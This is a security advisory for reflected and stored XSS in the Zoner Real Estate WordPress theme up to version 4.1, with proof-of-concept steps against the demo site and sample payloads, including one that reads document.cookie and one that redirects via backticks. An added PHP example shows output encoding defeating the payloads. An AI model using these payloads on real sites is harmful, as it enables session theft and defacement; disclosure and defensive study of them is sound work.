Zoner - Real Estate <= 4.1 - Reflected & Stored XSS

Description
Weak security measures, such as poor filtering of input field data, have been discovered in the «Zoner - Real Estate WordPress Theme».
Proof of Concept
PoC (Stored XSS Injection):
Register on the demo website and go to the https://zoner.fruitfulcode.com/author/[your_login]/?profile-page=my_profile page. Inside any text field, type "> first to «close» the input field, then add your payload and save the data; the code will be injected. For any text box, use </textarea> first instead of ">, followed by your payload.
Sample payload #1: "><script>alert('QUIXSS')</script>
Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">
Sample payload #3: "><img src=x onerror=alert('QUIXSS')>

PoC (Reflected XSS Injection):
Go to any page with the «Search Your Property» form, e.g. https://zoner.fruitfulcode.com/home_v/3/, and use your payload inside the «Keyword» input field. Keep in mind that quotes are filtered, but this can be bypassed by using a combination of ` quotes and «no quotes» (see the provided samples).
Sample payload #1: "><img src="x" onerror="alert(document.cookie)">
Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>
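The following PHP is an added illustration, not code from the Zoner theme or from the advisory's author. It covers both PoCs above: it shows why stripping double quotes (the only filtering the reflected case reports) leaves the «Keyword» field exploitable, and how context-aware output encoding neutralises every payload listed for the stored and reflected cases. The template helpers are invented, and htmlspecialchars() stands in for WordPress's esc_attr() / esc_textarea(), which perform equivalent encoding, so the script runs outside WordPress.

```php
<?php
// Added example, not code from the Zoner theme or the advisory author.
// Shows why a quote filter is not a fix and how encoding for the actual
// output context (attribute value vs. textarea content) neutralises the
// advisory's payloads. Helper names are invented; htmlspecialchars() stands
// in for WordPress's esc_attr() / esc_textarea().

/** The only defence the advisory reports for the search form: drop double quotes. */
function strip_double_quotes(string $value): string
{
    return str_replace('"', '', $value);
}

/** Encode a value for a double-quoted HTML attribute (esc_attr() in WordPress). */
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Encode textarea content (esc_textarea() in WordPress); encoding '<' means a
 *  literal "</textarea>" in the data can no longer terminate the element. */
function encode_textarea(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Hypothetical template fragments for the two contexts the advisory names. */
function render_keyword_input(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . encode_attr($keyword) . '">';
}

function render_profile_textarea(string $text): string
{
    return '<textarea name="about">' . encode_textarea($text) . '</textarea>';
}

/** True when the user-controlled fragment can no longer open or close a tag
 *  or end the surrounding attribute: no raw '<', '>' or '"' survives. */
function fragment_is_inert(string $fragment): bool
{
    return strpbrk($fragment, '<>"') === false;
}

// Constructed inputs: the advisory's own sample payloads, plus the
// </textarea> variant it describes for multi-line fields.
$samples = [
    '"><script>alert(\'QUIXSS\')</script>',
    '"><img src="x" onerror="alert(\'QUIXSS\');">',
    '"><img src=x onerror=alert(\'QUIXSS\')>',
    '"><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>',
    '</textarea><script>alert(\'QUIXSS\')</script>',
];

foreach ($samples as $i => $payload) {
    // Quote stripping leaves '<', '>' and backticks untouched, so the
    // backtick variant needs no quote at all to break out of the attribute.
    $filtered = strip_double_quotes($payload);
    // Encoding makes the fragment inert in both contexts.
    $attr = encode_attr($payload);
    $text = encode_textarea($payload);
    printf(
        "payload #%d  quote-filter inert: %s  attr-encoded inert: %s  textarea-encoded inert: %s\n",
        $i + 1,
        fragment_is_inert($filtered) ? 'yes' : 'NO',
        fragment_is_inert($attr) ? 'yes' : 'NO',
        fragment_is_inert($text) ? 'yes' : 'NO'
    );
}

// Full rendered markup for one reflected and one stored case, to show the
// encoded value sitting harmlessly inside its context.
echo render_keyword_input($samples[3]), "\n";
echo render_profile_textarea($samples[4]), "\n";
```

Run with `php example.php`: the quote-filter column prints `NO` for every payload, because the angle brackets that form the injected tag are never touched, while both encoded columns print `yes`. The practical rule for a theme is to choose the escaping function by the HTML context the value lands in (esc_attr() inside attributes, esc_textarea() inside a textarea, esc_html() in element text) at the point of output, rather than trying to filter characters on input.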

Affects Theme

Fixed in version 4.1.1

References

URL https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher QUIXSS
Submitter quixss
Submitter Website defcon.su
Submitter Twitter @quixss
Views 5822
Verified Yes
WPVDB ID 9424

Timeline

Publicly Published 2019-07-05
Added 2019-07-05
Last Updated 2019-07-05
